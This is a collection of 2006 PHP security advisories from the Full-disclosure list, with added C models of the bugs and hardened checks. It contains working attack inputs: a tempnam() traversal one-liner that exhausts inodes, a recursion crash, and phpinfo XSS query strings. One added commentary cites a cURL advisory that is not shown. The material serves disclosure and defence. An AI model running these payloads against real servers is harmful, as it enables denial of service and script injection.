http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx

- ---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in 
/www/2020/phpBB2/viewtopic.php on line 487

Warning: urlencode() expects parameter 1 to be string, array given in 
/www/2020/phpBB2/viewtopic.php on line 498

Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/viewtopic.php:487) in 
/www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/viewtopic.php:487) in 
/www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/viewtopic.php:487) in 
/www/2020/phpBB2/includes/page_header.php on line 486
- ---Result ---

The problem appears if display_errors==1, but that is the case on many websites 
(even at php.net).

- --- 2. Sql Errors ---

The problem appears because we can add any integer to the end of the SQL query 
(LIMIT). The query will fail if the value is below 0 or above -2^32.

Example:

http://[HOST]/2020/phpBB2/memberlist.php?start=-1

- ---Code ---
$start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 
0;
- ---Code ---

- ---Result ---
Could not query users

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near '-1, 
50' at line 4

SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, 
user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, 
user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER 
BY user_regdate ASC LIMIT -1, 50

Line : 151
File : memberlist.php
- ---Result ---

- --- 3. How to fix ---
Turn off display_errors or use a function like is_string().

- --- 4. Greets ---
sp3x

Infospec, p_e_a, krasza, revival, l5x

- --- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFEW4pi3Ke13X/fTO4RAqV7AJ9PeZ9nbRUYATqArEzLOdenG1ypHwCguPa5
7DlqP3M3vq1frb7Zc3y+KrU=
=4U6Y
-END PGP SIGNATURE-


[Full-disclosure] copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2

2006-04-08 Thread Maksymilian Arciemowicz
Source: http://securityreason.com/achievement_securityalert/37

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 2.4.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1608

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed 
from C, Java and Perl with a couple of unique PHP-specific features thrown 
in. The goal of the language is to allow web developers to write dynamically 
generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at 
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the 
PHP Conference Material is freely available. 

The PHP safe mode is an attempt to solve the shared-server security problem. 
It is architecturally incorrect to try to solve this problem at the PHP 
level, but since the alternatives at the web server and OS levels aren't very 
realistic, many people, especially ISP's, use safe mode for now.

- --- 1. Safe Mode Bypass ---
A general problem exists in the safe mode function, because safe mode accepts 
paths like "compress.zlib://". 

PHP442 File "main/safe_mode.c"
- -78-80---
wrapper = php_stream_locate_url_wrapper(filename, NULL, 
STREAM_LOCATE_WRAPPERS_ONLY TSRMLS_CC);
if (wrapper != NULL)
return 1;
- -78-80---

If php_stream_locate_url_wrapper() returns something, safe mode stops checking.
Let's see the function php_stream_locate_url_wrapper().

PHP442 File "main/streams.c"

- -2522-2588---
PHPAPI php_stream_wrapper *php_stream_locate_url_wrapper(const char *path, 
char **path_for_open, int options TSRMLS_DC)
{
HashTable *wrapper_hash = (FG(stream_wrappers) ? FG(stream_wrappers) : 
&url_stream_wrappers_hash);
php_stream_wrapper *wrapper = NULL;
const char *p, *protocol = NULL;
int n = 0;

if (path_for_open)
*path_for_open = (char*)path;

if (options & IGNORE_URL)
return (options & STREAM_LOCATE_WRAPPERS_ONLY) ? NULL : 
&php_plain_files_wrapper;

for (p = path; isalnum((int)*p) || *p == '+' || *p == '-' || *p == '.'; 
p++) 
{
n++;
}

if ((*p == ':') && (n > 1) && !strncmp("://", p, 3)) {
protocol = path;
} else if (strncasecmp(path, "zlib:", 5) == 0) {
/* BC with older php scripts and zlib wrapper */
protocol = "compress.zlib";
n = 13;
if (options & REPORT_ERRORS) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Use of \"zlib:\" wrapper is deprecated; please use \"compress.zlib://\" instead.");
}
}

if (protocol)   {
if (FAILURE == zend_hash_find(wrapper_hash, (char*)protocol, n, 
(void**)&wrapper))  {
char wrapper_name[32];

if (options & REPORT_ERRORS) {
if (n >= sizeof(wrapper_name))
n = sizeof(wrapper_name) - 1;
PHP_STRLCPY(wrapper_name, protocol, 
sizeof(wrapper_name), n);

php_error_docref(NULL TSRMLS_CC, E_NOTICE, "Unable to find the wrapper \"%s\" - did you forget to enable it when you configured PHP?",
wrapper_name);
}

wrapper = NULL;
protocol = NULL;
}
}
/* TODO: curl based streams probably support file:// properly */
if (!protocol || !strncasecmp(protocol, "file", n)) {
if (protocol && path[n+1] == '/' && path[n+2] == '/')   {
if (options & REPORT_ERRORS)
php_error_docref(NULL TSRMLS_CC, E_WARNING, "remote host file access not supported, %s", path);
return NULL;
}
if (protocol && path_for_open)
*path_for_open = (char*)path + n + 1;

/* fall back on regular file access */
return (options & STREAM_LOCATE_WRAPPERS_ONLY) ? NULL : 
&php_plain_files_wrapper;
}

if (wrapper && wrapper->is_url && !PG(allow_url_fopen)) {
if (options & REPORT_ERRORS)
php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL file-access is disabled in the server configuration");
return NULL;
}

   
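To see why the early return in safe_mode.c matters, the C model below reduces the scheme scan of php_stream_locate_url_wrapper() to a few lines, applies the original "any located wrapper ends the check" rule from the quoted safe_mode.c lines, and contrasts it with a rule that only lets remote URL wrappers skip the uid check. This is an added example and not PHP's own code: the wrapper table, the function names and the hardened rule are this example's assumptions, not the fix the PHP project shipped.

```c
/* Added example, not PHP's own code: a reduced model of the scheme scan in
 * php_stream_locate_url_wrapper() and the early return in safe_mode.c quoted
 * above. The wrapper table and function names are assumptions. */
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <ctype.h>

/* A registered stream wrapper: its scheme and whether it reaches the network. */
struct wrapper { const char *scheme; int is_url; };

/* Assumed registry. compress.zlib and file open local files; http/ftp do not. */
static const struct wrapper kWrappers[] = {
    { "file", 0 }, { "compress.zlib", 0 }, { "http", 1 }, { "ftp", 1 },
};

/* Mirrors the scan: a run of letters, digits, '+', '-' or '.' followed by
 * "://" is a scheme, and "zlib:" is the legacy alias for compress.zlib.
 * Returns the wrapper, or NULL for a plain path or an unknown scheme;
 * *rest points after the scheme (or at path itself when NULL is returned). */
static const struct wrapper *locate_wrapper(const char *path, const char **rest)
{
    const char *p = path, *scheme = NULL;
    size_t n = 0, i;

    while (isalnum((unsigned char)*p) || *p == '+' || *p == '-' || *p == '.') {
        p++;
        n++;
    }
    if (*p == ':' && n > 1 && strncmp("://", p, 3) == 0) {
        scheme = path;
        *rest = p + 3;
    } else if (strncasecmp(path, "zlib:", 5) == 0) {
        scheme = "compress.zlib";
        n = 13;
        *rest = path + 5;
    }
    if (scheme != NULL) {
        for (i = 0; i < sizeof kWrappers / sizeof kWrappers[0]; i++) {
            if (strlen(kWrappers[i].scheme) == n &&
                strncasecmp(kWrappers[i].scheme, scheme, n) == 0)
                return &kWrappers[i];
        }
    }
    *rest = path;            /* no scheme or unknown scheme: plain file fallback */
    return NULL;
}

enum verdict { CHECKED_PATH, SKIPPED_WRAPPER };

/* safe_mode.c as quoted: any located wrapper ends the check before the uid
 * comparison, so compress.zlib:///etc/passwd is never checked. *checked gets
 * the filesystem path that would be checked, or NULL when the check is skipped. */
static enum verdict safe_mode_original(const char *path, const char **checked)
{
    const char *rest;
    if (locate_wrapper(path, &rest) != NULL) {
        *checked = NULL;
        return SKIPPED_WRAPPER;
    }
    *checked = path;
    return CHECKED_PATH;
}

/* This example's hardening (not PHP's shipped fix): only remote URL wrappers
 * are left to allow_url_fopen; a local wrapper is stripped and the path it
 * would open is checked exactly like a plain path. */
static enum verdict safe_mode_hardened(const char *path, const char **checked)
{
    const char *rest;
    const struct wrapper *w = locate_wrapper(path, &rest);
    if (w != NULL && w->is_url) {
        *checked = NULL;
        return SKIPPED_WRAPPER;
    }
    *checked = w != NULL ? rest : path;
    return CHECKED_PATH;
}

int main(void)
{
    static const char *samples[] = {
        "/etc/passwd", "compress.zlib:///etc/passwd", "zlib:/etc/passwd",
        "file:///etc/passwd", "http://example.com/x",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        const char *c1, *c2;
        enum verdict v1 = safe_mode_original(samples[i], &c1);
        enum verdict v2 = safe_mode_hardened(samples[i], &c2);
        printf("%-30s original: %s %-12s hardened: %s %s\n", samples[i],
               v1 == CHECKED_PATH ? "checks" : "skips ", c1 ? c1 : "-",
               v2 == CHECKED_PATH ? "checks" : "skips ", c2 ? c2 : "-");
    }
    return 0;
}
```

The point the table makes is that the wrapper lookup answers "is there a handler for this scheme", not "does this open a local file", so a decision taken purely on its return value lets every local wrapper through.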

[Full-disclosure] tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2

2006-04-08 Thread Maksymilian Arciemowicz
Source: http://securityreason.com/achievement_securityalert/36

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 26.3.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1494

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed 
from C, Java and Perl with a couple of unique PHP-specific features thrown 
in. The goal of the language is to allow web developers to write dynamically 
generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at 
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the 
PHP Conference Material is freely available. 
tempnam -- Create file with unique file name

- --- 1. tempnam() open_basedir bypass ---
The function tempnam() requires 2 arguments.

http://pl.php.net/manual/en/function.tempnam.php

string tempnam ( string dir, string prefix )

So, if we have open_basedir set to /home, we can't create a file outside the 
/home directory.
In ext/standard/file.c (PHP 4.4.2)

- -550-578---
PHP_FUNCTION(tempnam)
{
pval **arg1, **arg2;
char *d;
char *opened_path;
char p[64];
FILE *fp;

if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == 
FAILURE) {
WRONG_PARAM_COUNT;
}
convert_to_string_ex(arg1);
convert_to_string_ex(arg2);

if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
RETURN_FALSE;
}

d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));
strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p));

if ((fp = php_open_temporary_file(d, p, &opened_path TSRMLS_CC))) {
fclose(fp);
RETVAL_STRING(opened_path, 0);
} else {
RETVAL_FALSE;
}
efree(d);
}
- -550-578---

if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
RETURN_FALSE;
}

Where is arg2?
So we can write an exploit like:
tempnam("path_from_open_basedir", 
"../../../../../../../../Open_basedir_bypasswd");

tempnam("/home", "../../../../../../tmp/cx");

etc.

It is a low-severity issue, but you can try to create a lot of files and exhaust 
the inodes on the disk. I have one partition:

Filesystem   Size  Used Avail Capacity  Mounted on
/dev/ad0s1e  1.0G   97M  858M    10%    /var             <- Space (B)

Filesystem  1K-blocks  Used  Avail Capacity iused  ifree %iused  Mounted on
/dev/ad0s1e   1012974 94472 837466   10%    3796 137514    3%    /var  <- INODES

where mysql and apache try to create files. When we exhaust the free inodes, 
the system has big problems with apache and mysql.

Example:

cxib# php -r 'function cx(){ tempnam("/www/", "../../../../../../var/tmp/cx"); 
cx(); } cx();'
/var: create/symlink failed, no inodes free

/var: create/symlink failed, no inodes free

/var: create/symlink failed, no inodes free

/var: create/symlink failed, no inodes free
... etc

/usr/local/libexec/mysqld: Can't create/write to file 
'/var/tmp/ibBIsZ6o' (Errcode: 13)
And mysql die()!

- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS

- --- 3. Greets ---

For: sp3x
and
p_e_a, pi3, eax, Infospec ;]

- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFEOAZB3Ke13X/fTO4RAiDmAKCbBZP8JBC0F/9cB5OgUFJPgqHB4QCgon9L
kBEMIExP2TZ0+NP7l5uk9TE=
=f3i4
-END PGP SIGNATURE-

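The two checks above, the cURL file:// safe_mode check from the earlier message and the tempnam() open_basedir check here, fail for the same reason: the path that is checked is not the path that is opened. The C model below is an added example, not PHP's own code, that shows both mismatches side by side with a hardened variant of each. The function names, the base directories, the sample URL with its embedded NUL byte and the prefix are constructed for illustration, and the hardened checks are this example's suggestions rather than the PHP project's patch.

```c
/* Added example, not PHP's own code: models the two path-check mismatches
 * from the cURL file:// safe_mode and tempnam() open_basedir advisories.
 * Function names, base directories and sample paths are assumptions. */
#include <stdio.h>
#include <string.h>

#define PATH_MAX_LEN 512

/* Lexically resolve "." and ".." in an absolute path; ".." at "/" stays at
 * "/". Returns 0 on success, -1 if the input is relative or too long. */
static int normalize_path(const char *in, char *out, size_t outsz)
{
    char buf[PATH_MAX_LEN];
    size_t len = 1;

    if (in[0] != '/' || strlen(in) >= sizeof buf || outsz < 2) return -1;
    strcpy(buf, in);
    out[0] = '/';
    out[1] = '\0';
    for (char *tok = strtok(buf, "/"); tok != NULL; tok = strtok(NULL, "/")) {
        if (strcmp(tok, ".") == 0) continue;
        if (strcmp(tok, "..") == 0) {            /* pop the last component */
            while (len > 1 && out[len - 1] != '/') len--;
            if (len > 1) len--;                  /* and its separator */
            out[len] = '\0';
            continue;
        }
        size_t tl = strlen(tok);
        if (len + 1 + tl >= outsz) return -1;
        if (len > 1) out[len++] = '/';
        memcpy(out + len, tok, tl);
        len += tl;
        out[len] = '\0';
    }
    return 0;
}

/* True if a normalized path lies inside a normalized base directory. */
static int is_under(const char *base, const char *path)
{
    size_t bl = strlen(base);
    return strncmp(base, path, bl) == 0 && (path[bl] == '/' || path[bl] == '\0');
}

/* cURL case. url/len is a PHP-style length-counted string that may contain a
 * NUL. As the advisory describes, the check maps NUL to '_' and judges the
 * whole string, while libcurl gets a C string that ends at the NUL. Returns 1
 * if the check accepts; *opened gets the path libcurl would really open.
 * hardened != 0 adds this example's fix: reject any embedded NUL outright. */
static int curl_file_check(const char *url, size_t len, const char *script_dir,
                           int hardened, char *opened, size_t osz)
{
    static const char pfx[] = "file://";
    size_t pl = sizeof pfx - 1, plen, i;
    char checked[PATH_MAX_LEN], norm[PATH_MAX_LEN];
    const char *nul;

    if (osz) opened[0] = '\0';
    if (len < pl || memcmp(url, pfx, pl) != 0) return 0;
    plen = len - pl;
    if (plen >= sizeof checked) return 0;
    if (hardened && memchr(url, '\0', len) != NULL) return 0;

    for (i = 0; i < plen; i++)
        checked[i] = url[pl + i] == '\0' ? '_' : url[pl + i];
    checked[plen] = '\0';
    if (normalize_path(checked, norm, sizeof norm) != 0) return 0;

    nul = memchr(url + pl, '\0', plen);          /* where the C string ends */
    snprintf(opened, osz, "%.*s", (int)(nul ? (size_t)(nul - (url + pl)) : plen), url + pl);
    return is_under(script_dir, norm);
}

/* tempnam(dir, prefix) case. The original checks only dir against
 * open_basedir; hardened != 0 checks the joined, normalized stem the file is
 * created from, so "../" in prefix cannot escape. Returns 1 if allowed and
 * writes the resolved stem to *target. */
static int tempnam_check(const char *dir, const char *prefix, const char *basedir,
                         int hardened, char *target, size_t tsz)
{
    char joined[PATH_MAX_LEN], norm[PATH_MAX_LEN], dnorm[PATH_MAX_LEN];

    if (snprintf(joined, sizeof joined, "%s/%s", dir, prefix) >= (int)sizeof joined) return 0;
    if (normalize_path(joined, norm, sizeof norm) != 0) return 0;
    snprintf(target, tsz, "%s", norm);
    if (!hardened) {                             /* prefix is never looked at */
        if (normalize_path(dir, dnorm, sizeof dnorm) != 0) return 0;
        return is_under(basedir, dnorm);
    }
    return is_under(basedir, norm);
}

/* Constructed inputs (assumptions). The URL carries an embedded NUL byte. */
static const char kEvilUrl[] = "file:///home/victim/secret.php\0/../../attacker/www/ok.php";
#define kEvilUrlLen (sizeof kEvilUrl - 1)
static const char kScriptDir[] = "/home/attacker/www";   /* what safe_mode lets us read */
static const char kBaseDir[] = "/home";                  /* open_basedir */
static const char kEvilPrefix[] = "../../../../../../tmp/cx";

int main(void)
{
    char opened[PATH_MAX_LEN], target[PATH_MAX_LEN];
    int ok = curl_file_check(kEvilUrl, kEvilUrlLen, kScriptDir, 0, opened, sizeof opened);
    printf("curl original: check=%d, libcurl opens %s\n", ok, opened);
    printf("curl hardened: check=%d\n",
           curl_file_check(kEvilUrl, kEvilUrlLen, kScriptDir, 1, opened, sizeof opened));
    ok = tempnam_check(kBaseDir, kEvilPrefix, kBaseDir, 0, target, sizeof target);
    printf("tempnam original: check=%d, file stem %s\n", ok, target);
    printf("tempnam hardened: check=%d\n",
           tempnam_check(kBaseDir, kEvilPrefix, kBaseDir, 1, target, sizeof target));
    return 0;
}
```

In both cases the hardened variant simply checks the value that will be handed to the filesystem, after rejecting bytes (the NUL) that the filesystem layer cannot carry.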


[Full-disclosure] function *() php/apache Crash PHP 4.4.2 and 5.1.2

2006-04-08 Thread Maksymilian Arciemowicz
Source: http://securityreason.com/achievement_securityalert/35

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[function *() php/apache Crash PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 21.3.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1549

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed 
from C, Java and Perl with a couple of unique PHP-specific features thrown 
in. The goal of the language is to allow web developers to write dynamically 
generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at 
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the 
PHP Conference Material is freely available. 

- --- 1. function *() Crash ---
PHP4/5 is vulnerable to a local denial of service. The general problem is in 
how data is allocated in memory. 

For example, an attack:

cxib# php -r 'function cx(){ cx(); } cx();'
Segmentation fault (core dumped)
cxib# 

Segfault. Let's see what we have in gdb:

- ---
cxib# cat /www/functionsegfault.php

cxib# gdb -q php
(gdb) r '/www/functionsegfault.php'
Starting program: /usr/local/bin/php '/www/functionsegfault.php'

Program received signal SIGSEGV, Segmentation fault.
0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260, 
__zend_filename=0x811d8c0 
"/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c", 
__zend_lineno=1568)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111
111 /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c: No such 
file or directory.
in /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c
(gdb) bt
#0  0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260, 
__zend_filename=0x811d8c0 
"/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c", 
__zend_lineno=1568)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111
#1  0x080f042a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1568
#2  0x080f019a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719
#3  0x080f019a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719
#4  0x080f019a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719
#5  0x080f019a in execute (op_array=0x81b3880)
...
- ---

or in apache error_log

[Mon Mar 20 12:12:54 2006] [notice] child pid 744 exit signal Illegal 
instruction (4)

- --- 2. Greets ---

For: sp3x
and
p_e_a, pi3, eax, Infospec ;]

- --- 3. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFEOAT43Ke13X/fTO4RAiFnAKC+vzJm1w24b4VN9CMdhE6e6a2L4QCePbp7
lNzhZke21IHXM0TvvjntXyY=
=Y7Ft
-END PGP SIGNATURE-



[Full-disclosure] phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2

2006-04-08 Thread Maksymilian Arciemowicz
Source: http://securityreason.com/achievement_securityalert/34

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 26.2.2006
- -Public: 8.4.2006
from SecurityReason.Com
CVE-2006-0996

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed 
from C, Java and Perl with a couple of unique PHP-specific features thrown 
in. The goal of the language is to allow web developers to write dynamically 
generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at 
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the 
PHP Conference Material is freely available. 

- --- 1. Cross Site Scripting ---
In phpinfo() you can see all variables, like:

file: standard/info.c
- -630-636---
php_print_gpcse_array("_REQUEST", sizeof("_REQUEST")-1 
TSRMLS_CC);
php_print_gpcse_array("_GET", sizeof("_GET")-1 TSRMLS_CC);
php_print_gpcse_array("_POST", sizeof("_POST")-1 TSRMLS_CC);
php_print_gpcse_array("_FILES", sizeof("_FILES")-1 TSRMLS_CC);
php_print_gpcse_array("_COOKIE", sizeof("_COOKIE")-1 TSRMLS_CC);
php_print_gpcse_array("_SERVER", sizeof("_SERVER")-1 TSRMLS_CC);
php_print_gpcse_array("_ENV", sizeof("_ENV")-1 TSRMLS_CC);
- -630-636---

The function php_print_gpcse_array() checks only 4096 bytes of any array variable. 

file: standard/info.c
- -135-154---
if (Z_TYPE_PP(tmp) == IS_ARRAY) {
zval *tmp3;
MAKE_STD_ZVAL(tmp3);
if (!sapi_module.phpinfo_as_text) {
PUTS("");
}
php_start_ob_buffer(NULL, 4096, 1 TSRMLS_CC);
zend_print_zval_r(*tmp, 0);
php_ob_get_buffer(tmp3 TSRMLS_CC);
php_end_ob_buffer(0, 0 TSRMLS_CC);

elem_esc = php_info_html_esc(Z_STRVAL_P(tmp3) 
TSRMLS_CC);
PUTS(elem_esc);
efree(elem_esc);
zval_ptr_dtor(&tmp3);

if (!sapi_module.phpinfo_as_text) {
PUTS("");
}
} else if (Z_TYPE_PP(tmp) != IS_STRING) {
- -135-154---

So if we create an array longer than 4096 bytes, the html tags won't be removed.

Exploit:
If a php script calls phpinfo(), try creating some variables (array) like

phpinfo.php?cx[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][][][]=[XSS]

or 

phpinfo.php?cx[]=c..~4096chars...ccc[XSS]

- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS

- --- 3. Greets ---

For: sp3x
and
p_e_a, pi3, eax ;]

- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFEOAIl3Ke13X/fTO4RAo4LAJ0fBxJWN64vWrDYJEuhGkqc/OC42QCbBxip
f35+6LHjuBoqP5D2JV84ufs=
=iz3m
-END PGP SIGNATURE-

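The mechanism is the chunked output buffer: php_start_ob_buffer() with a chunk size of 4096 flushes raw bytes to the client as soon as the buffer reaches that size, and php_info_html_esc() only ever sees what is still in the buffer when php_ob_get_buffer() runs. The C model below is an added example, not PHP's own code; it reproduces that flush rule with a constructed payload and shows that disabling auto-flush (chunk size 0, this example's hardening, not necessarily the patch the PHP project shipped) makes the whole dump go through the escaper. The sink type, function names and sample values are assumptions.

```c
/* Added example, not PHP's own code: a reduced model of the output buffer
 * used by php_print_gpcse_array() for array values. Names, the sink type and
 * the sample values are assumptions chosen for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define OB_CHUNK 4096   /* chunk size phpinfo() passes to php_start_ob_buffer() */

/* A growable byte string, used both for the client page and the ob buffer. */
struct sink { char *data; size_t len, cap; };

static void sink_append(struct sink *s, const char *p, size_t n)
{
    if (s->len + n + 1 > s->cap) {
        s->cap = (s->len + n + 1) * 2;
        s->data = realloc(s->data, s->cap);
        if (s->data == NULL) abort();
    }
    memcpy(s->data + s->len, p, n);
    s->len += n;
    s->data[s->len] = '\0';
}

/* The escaping php_info_html_esc() applies to the retained buffer. */
static void html_esc_append(struct sink *s, const char *p, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        switch (p[i]) {
        case '<':  sink_append(s, "&lt;", 4);   break;
        case '>':  sink_append(s, "&gt;", 4);   break;
        case '&':  sink_append(s, "&amp;", 5);  break;
        case '"':  sink_append(s, "&quot;", 6); break;
        default:   sink_append(s, p + i, 1);    break;
        }
    }
}

/* One write into the ob buffer. With a non-zero chunk size the buffer
 * auto-flushes once it reaches the chunk size, and the flushed bytes go to
 * the client unescaped: that is the bug. */
static void ob_write(struct sink *ob, struct sink *client, const char *p, size_t chunk)
{
    sink_append(ob, p, strlen(p));
    if (chunk != 0 && ob->len >= chunk) {
        sink_append(client, ob->data, ob->len);
        ob->len = 0;
        ob->data[0] = '\0';
    }
}

/* Render one request variable that is an array with a single string element,
 * the way phpinfo() prints it: zend_print_zval_r() writes into the buffer in
 * pieces, then php_ob_get_buffer() hands what is left to the escaper.
 * Returns the client-visible HTML; the caller frees it. */
static char *render_array_value(const char *value, size_t chunk)
{
    struct sink client = { NULL, 0, 0 }, ob = { NULL, 0, 0 };
    ob_write(&ob, &client, "Array\n(\n    [0] => ", chunk);
    ob_write(&ob, &client, value, chunk);
    ob_write(&ob, &client, "\n)\n", chunk);
    html_esc_append(&client, ob.data, ob.len);   /* only the tail is escaped */
    free(ob.data);
    return client.data;
}

/* True if a raw <script> tag survived into the page. */
static int leaks_raw_tag(const char *page)
{
    return strstr(page, "<script>") != NULL;
}

/* Constructed attacker value: pad bytes of filler followed by a script tag,
 * like the advisory's cx[]=ccc...ccc[XSS] request. Caller frees. */
static char *make_padded_payload(size_t pad)
{
    static const char tag[] = "<script>alert(1)</script>";
    char *v = malloc(pad + sizeof tag);
    if (v == NULL) abort();
    memset(v, 'c', pad);
    memcpy(v + pad, tag, sizeof tag);
    return v;
}

int main(void)
{
    char *small = make_padded_payload(16), *big = make_padded_payload(OB_CHUNK);
    char *p1 = render_array_value(small, OB_CHUNK);
    char *p2 = render_array_value(big, OB_CHUNK);
    char *p3 = render_array_value(big, 0);
    printf("short value, chunk 4096: raw tag leaked = %d\n", leaks_raw_tag(p1));
    printf("long value,  chunk 4096: raw tag leaked = %d\n", leaks_raw_tag(p2));
    printf("long value,  chunk 0:    raw tag leaked = %d\n", leaks_raw_tag(p3));
    free(p1); free(p2); free(p3); free(small); free(big);
    return 0;
}
```

The same shape of bug appears wherever an escaper is applied to a capture buffer that can drain on its own: the escaping step is correct, it is just not on the path the overflowing bytes take.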


[Full-disclosure] Re: Mis-diagnosed XSS bugs hiding worse issues due to PHP feature

2006-04-02 Thread Maksymilian Arciemowicz
On Saturday 01 April 2006 10:11, Steven M. Christey wrote:

We reported this xss (in php display_errors) on 28 May 2005. 

http://bugs.php.net/bug.php?id=33173&edit=1
Reply from php developers: "Bogus". 
"...Show erros is only a convenience thing to aid you while developing. Thus 
no user will ever see such error messages. So in the end it is not usable for 
phishing and alike..."

Many functions in php are vulnerable to xss. It is not dangerous but shouldn't 
exist. For example 
http://securityreason.com/achievement_securityalert/18
or
gpg version: http://securityreason.com/achievement_securityalert/18/1
the function include() in postnuke.

> In a post-disclosure analysis [1] of a security issue announced by
> rgod [2], Siegfried observed that the reported XSS actually originated
> from a file inclusion vulnerability, in which the XSS was reflected
>
> back from an error message when the file inclusion failed:
> >About the xss, it is an xss in the php error message, there are many
> >php functions returning errors without filtering them, anybody noted
> >that?
>
> Yes.
>
> I would greatly appreciate some corroboration from the real PHP/web
> security experts out there on what I'm about to say.  If true, it
> would partly explain why XSS is so rampant in PHP applications.
>
> As I understand it, this behavior is due to an XSS problem in PHP
> itself before 5.1.2 (CVE-2006-0208), as announced in January 2006:
>
>   http://www.php.net/release_5_1_2.php
>
> It's not clear if PHP 4.x was affected.
>
> The XSS happens when display_errors and html_errors are enabled - it
> won't quote the output from raw error messages.
>
> No doubt many so-called XSS errors these days are the result of this
> particular issue in PHP.  They're aren't entirely the application's
